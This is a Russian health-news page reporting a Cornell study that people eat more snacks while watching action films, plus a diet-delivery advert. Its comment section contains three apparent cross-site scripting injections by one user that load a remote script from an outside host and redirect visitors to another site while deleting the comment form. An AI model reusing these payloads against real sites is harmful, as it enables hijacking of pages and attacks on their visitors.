Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Голливудское кино делает ...  >>  Голливудское кино делает вас толстым!
 
Обратная связь
 

Голливудское кино делает вас толстым!

Размер шрифта
22 апреля 2015 00:00
  • google_analytics: false
  • Нравится

Ученые предупреждают: просмотр телевизора может быть очень вреден для вашей талии.

Ваш любимый сериал делает вас толстой! Как жить дальше?

Согласно данным исследования, проведенного в Корнелльском Университете, люди едят гораздо больше, когда смотрят фильмы в жанре экшн и боевики, чем когда смотрят что-то менее динамичное и напряженное. «Мы выяснили, что когда вы едите и смотрите динамичный фильм, жуете вы тоже гораздо активнее», – рассказывает Анер Тал, ведущий автор работы. «Другими словами, чем более увлекательным будет фильм, тем больше вы съедите».

В исследовании приняли участие 94 добровольца-студента. Ученые дали им конфеты Эмэндэмс, печенья, моркови и винограда, а затем всем им было предложено смотреть телевизор в течение двадцати минут. Треть участников смотрела фрагмент боевика «Остров», треть смотрела телевизионное шоу, а последняя треть – тот же фрагмент фильма «Остров», но только без звука.

«Те, кто смотрел фильм «Остров», съели в два раза больше, чем те, кто смотрел телевизионное шоу», – рассказывает соавтор исследования Брайан Вансинк. «Те, кто смотрел фильм без звука, съели на 36% больше». Участники, которые смотрели боевик, употребили больше калорий – 354 и 314 калорий для фрагментов фильма со звуком и без звука, соответственно. Во время просмотра телевизионного шоу участники в среднем употребили всего 215 калорий.

«В фильме сюжет развивается очень быстро, есть много перемещений камеры и движения – это затягивает вас и отвлекает от того, что вы едите. При просмотре такого фильма вы едите больше, так как уделяете меньше внимания тому, что кладете в рот», – объясняет Тал. «Хорошие новости в том, что если при просмотре подобных фильмов рядом будет лежать только здоровая еда, то и ее люди будут есть в больших количествах. Стоит использовать это преимущество», – добавляет Вансинк.

Не представляете жизнь без фильмов и сериалов? Специально для вас создана Диеты Елены Малышевой! Уже готовая правильная еда для похудения будет доставлена вам в любое удобное место и время. Вам останется только есть и худеть!

Все о снижении веса в нашем специальном проекте «Сбрось лишнее».

Исследование было опубликовано в журнале JAMA: Internal Medicine.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:14

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
5 неожиданных причин, почему вы толстеете   Ваш любимый сериал делает вас толстой! Как жить дальше?   Гнев + голод = гневолод   С каждым годом набираете все больше и больше веса? Во всем виноват ваш язык!  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 07 августа 2012В Америке зарегистрирован новый препарат для снижения веса!
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
7 вопросов, чтобы похудеть!
Что не даст вам похудеть на праздниках
Как не сорваться на диете и похудеть?

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.